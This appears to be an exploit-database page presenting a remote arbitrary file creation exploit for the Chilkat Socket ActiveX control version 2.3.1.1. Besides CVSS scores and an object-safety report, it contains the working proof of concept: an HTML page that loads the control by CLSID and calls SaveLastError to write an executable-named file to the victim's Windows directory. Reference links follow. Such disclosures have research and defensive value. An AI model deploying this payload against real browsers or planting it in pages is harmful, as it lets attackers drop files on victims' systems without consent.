Chilkat Socket activex 2.3.1.1 Remote Arbitrary File Creation Exploit

2009.08.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<html> <title>ChilkatSocket.DLL Arbitrary File Creation</title><br><br> <body> Company Name : Chilkat Software, Inc.<br><br> Vulnerable DLL : ChilkatSocket.DLL<br><br> DLL's version : 2,3,1,1<br><br> Object Safety Report : <br> Report for Clsid: {474FCCCD-1B89-4D34-9E09-45807F23289C}<br> RegKey Safe for Script: Faux<br> RegKey Safe for Init: Faux<br> Implements IObjectSafety: Vrai<br> IDisp Safe: Safe for untrusted: caller,data<br> IPersist Safe: Safe for untrusted: caller,data <br> IPStorage Safe: Safe for untrusted: caller,data <br> Exploit : Arbitrary File Creation<br><br> Author : Underz0ne Crew<br> Zigma<br> Homepage : http://www.underz0ne.org<br><br> <object classid='clsid:474FCCCD-1B89-4D34-9E09-45807F23289C' id='boom' ></object> <script language='vbscript'> arg1="c:\winnt\uz_.exe" boom.SaveLastError arg1 </script> </body> <html>

References:

http://xforce.iss.net/xforce/xfdb/46657
http://www.securityfocus.com/bid/32333
http://www.milw0rm.com/exploits/7142
http://secunia.com/advisories/32738
http://osvdb.org/49902


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top